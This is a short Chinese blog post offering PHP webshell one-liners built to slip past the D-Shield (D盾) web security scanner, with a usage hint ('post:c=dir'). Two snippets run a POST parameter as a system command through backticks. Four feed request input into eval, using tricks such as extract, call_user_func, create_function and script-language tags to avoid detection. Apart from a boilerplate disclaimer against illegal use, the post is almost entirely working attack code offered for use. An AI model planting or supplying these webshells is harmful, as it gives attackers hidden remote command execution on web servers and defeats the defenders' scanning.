jasonx's Blog

音乐播放器
News:禁止使用本博客的技术文章、源码、工具等用于非法用途,否则后果自负。
你的位置: 首页 > 漏洞研究 > 过D盾一句话

过D盾一句话

jasonx 1225 0 条

免杀命令执行

食用方法:/shell.php post:c=dir
1:

<?php
$c=1;$a=$_POST;extract($a);print_r(`$c`);
?>

2:

<?php echo `$_=$_REQUEST[c]`; ?>

免杀webshell

1:

<?php
$a=call_user_func(function($u){return @$_REQUEST[$u];},'1');
eval(/**/($a));
?>

2:

<?php
@eval($_POST[a]);
</script>

3:

<script language="php">
function fun()
{@$b=($_POST[1]);
return @$b;
}
eval(fun());

4:

<?php
@extract(array(b=>create_function(NULL,fun2())));
@extract(array(c=>$b()));
function fun2(){
        $b=$_POST;
        return @($b[pass]);}
        ?>
继续浏览有关 none 的文章

与本文相关的文章

发表我的评论

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址